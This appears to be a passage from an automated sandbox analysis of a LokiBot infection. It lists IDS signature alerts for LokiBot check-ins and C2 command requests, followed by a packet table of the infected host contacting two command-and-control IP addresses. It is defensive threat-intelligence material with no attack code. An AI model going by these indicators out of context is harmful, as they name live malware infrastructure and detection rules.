                      10/14/21-08:29:56.968340TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.6104.21.62.32
                      10/14/21-08:29:56.968340TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2025381ET TROJAN LokiBot Checkin4992480192.168.2.6104.21.62.32
                      10/14/21-08:29:58.074973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.2.6104.21.62.32
                      10/14/21-08:29:59.226831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2025381ET TROJAN LokiBot Checkin4992580192.168.2.6172.67.219.104
                      10/14/21-08:29:59.226831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.2.6172.67.219.104
                      10/14/21-08:30:00.311329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2025381ET TROJAN LokiBot Checkin4992680192.168.2.6104.21.62.32
                      10/14/21-08:30:00.311329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2025381ET TROJAN LokiBot Checkin4992780192.168.2.6104.21.62.32
                      10/14/21-08:30:01.416467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2025381ET TROJAN LokiBot Checkin4992880192.168.2.6104.21.62.32
                      10/14/21-08:30:02.546683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.2.6104.21.62.32
                      10/14/21-08:30:03.716523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2025381ET TROJAN LokiBot Checkin4992980192.168.2.6172.67.219.104
                      10/14/21-08:30:03.716523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992980192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.6172.67.219.104
                      10/14/21-08:30:04.877321TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993080192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.6172.67.219.104
                      10/14/21-08:30:05.956296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2025381ET TROJAN LokiBot Checkin4993280192.168.2.6172.67.219.104
                      10/14/21-08:30:07.140644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993280192.168.2.6172.67.219.104
                      10/14/21-08:30:08.437281TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2025381ET TROJAN LokiBot Checkin4993380192.168.2.6104.21.62.32
                      10/14/21-08:30:08.437281TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.6104.21.62.32
                      10/14/21-08:30:09.692348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.6172.67.219.104
                      10/14/21-08:30:09.692348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993480192.168.2.6172.67.219.104
                      10/14/21-08:30:11.132684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2025381ET TROJAN LokiBot Checkin4993580192.168.2.6104.21.62.32
                      10/14/21-08:30:11.132684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993580192.168.2.6104.21.62.32
                      10/14/21-08:30:13.066124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2025381ET TROJAN LokiBot Checkin4993680192.168.2.6172.67.219.104
                      10/14/21-08:30:13.066124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.6172.67.219.104
                      10/14/21-08:30:15.336416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2025381ET TROJAN LokiBot Checkin4993780192.168.2.6104.21.62.32
                      10/14/21-08:30:15.336416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993780192.168.2.6104.21.62.32
                      10/14/21-08:30:16.682402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2025381ET TROJAN LokiBot Checkin4993880192.168.2.6172.67.219.104
                      10/14/21-08:30:16.682402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2025381ET TROJAN LokiBot Checkin4993980192.168.2.6172.67.219.104
                      10/14/21-08:30:18.312437TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993980192.168.2.6172.67.219.104

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 14, 2021 08:28:19.027772903 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.043910027 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.044029951 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.047157049 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.063246012 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.063373089 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.079444885 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.209945917 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.210149050 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.214078903 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:19.214210033 CEST4977980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:19.226104975 CEST8049779172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.327538013 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.343683004 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.343846083 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.347126961 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.363301039 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.363467932 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.379602909 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.460792065 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.461388111 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.463710070 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:20.463839054 CEST4978080192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:20.477552891 CEST8049780172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:21.319694996 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.335665941 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.335860968 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.339482069 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.355335951 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.355484962 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.371328115 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.535239935 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.535434008 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.539542913 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:21.539675951 CEST4978180192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:21.551295042 CEST8049781104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.573314905 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.589943886 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.590146065 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.592927933 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.609252930 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.609401941 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.625505924 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.751913071 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.752219915 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.755004883 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:22.755127907 CEST4978280192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:22.769331932 CEST8049782104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:23.772778034 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.789092064 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.789271116 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.792481899 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.808448076 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.808618069 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.826692104 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.945936918 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.946243048 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.950661898 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:23.950746059 CEST4978380192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:23.962250948 CEST8049783172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.866316080 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.882256985 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.882406950 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.885116100 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.901065111 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:24.901196003 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:24.917064905 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.039886951 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.040055990 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:25.044074059 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:25.044162989 CEST4978480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:25.055864096 CEST8049784172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:26.004973888 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.021157980 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.021306992 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.025161982 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.041219950 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.041390896 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.057322979 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.179322958 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.184068918 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:26.184221983 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.233534098 CEST4978580192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:26.249512911 CEST8049785104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:27.318810940 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.334852934 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.337574005 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.340971947 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.356816053 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.357132912 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.372992039 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.495248079 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.495812893 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.502477884 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:27.502729893 CEST4978680192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:27.511775017 CEST8049786172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.268244028 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.285348892 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.285460949 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.289741993 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.307091951 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.307250023 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.324394941 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.451376915 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.451589108 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.458794117 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:30.459002972 CEST4978780192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:30.467573881 CEST8049787172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.364558935 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.380477905 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.380641937 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.397798061 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.413549900 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.413613081 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.429367065 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.565464973 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.565495968 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:31.569339037 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.569370031 CEST4978880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:31.585639954 CEST8049788172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.492398024 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.508377075 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.508481026 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.511259079 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.527503014 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.527611971 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.543457985 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.680007935 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.680180073 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.683983088 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:32.684098005 CEST4978980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:32.695982933 CEST8049789172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:33.651530027 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.668298960 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:33.668442011 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.672461987 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.689089060 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:33.689187050 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.706042051 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:33.830368042 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:33.830600977 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.833925962 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:33.834012032 CEST4979080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:33.846543074 CEST8049790104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:34.871316910 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:34.887226105 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:34.887434006 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:34.890356064 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:34.906491041 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:34.906606913 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:34.922707081 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:35.044509888 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:35.044855118 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:35.048998117 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:35.049129963 CEST4979180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:35.060842037 CEST8049791172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:35.974087954 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:35.989825964 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:35.990343094 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:35.993002892 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:36.008764982 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:36.008896112 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:36.024523973 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:36.144937992 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:36.146392107 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:36.148103952 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:36.148227930 CEST4979280192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:36.162077904 CEST8049792172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:37.095299959 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.111279964 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:37.111439943 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.119939089 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.135917902 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:37.136126995 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.152204037 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:37.232311010 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:37.232479095 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.236232996 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:37.236380100 CEST4979380192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:37.252430916 CEST8049793104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:38.367342949 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.383460045 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:38.383738041 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.386394024 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.402209044 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:38.402403116 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.418232918 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:38.540837049 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:38.541168928 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.545337915 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:38.545483112 CEST4979480192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:38.556890011 CEST8049794172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.492939949 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.508737087 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.509788036 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.512557030 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.528422117 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.528501034 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.544223070 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.669177055 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.669383049 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.673511028 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:39.673631907 CEST4979580192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:39.685206890 CEST8049795172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.067152023 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.082995892 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.083137989 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.105942011 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.121716022 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.121790886 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.137526989 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.219671965 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.219835043 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.223129034 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:41.223215103 CEST4979880192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:41.235600948 CEST8049798172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.254771948 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.270489931 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.271445036 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.274934053 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.290599108 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.290678978 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.306401014 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.387685061 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.387815952 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.394315004 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:42.396763086 CEST4979980192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:42.403693914 CEST8049799172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:43.848814964 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:43.864871025 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:43.865060091 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:43.873245001 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:43.889305115 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:43.889446020 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:43.905512094 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:43.996604919 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:43.996789932 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:43.998589039 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:43.998670101 CEST4980080192.168.2.6104.21.62.32
                      Oct 14, 2021 08:28:44.013036013 CEST8049800104.21.62.32192.168.2.6
                      Oct 14, 2021 08:28:45.305026054 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.320739985 CEST8049801172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:45.320862055 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.343358994 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.359078884 CEST8049801172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:45.361588955 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.377338886 CEST8049801172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:45.464049101 CEST8049801172.67.219.104192.168.2.6
                      Oct 14, 2021 08:28:45.464484930 CEST4980180192.168.2.6172.67.219.104
                      Oct 14, 2021 08:28:45.467679977 CEST8049801172.67.219.104192.168.2.6
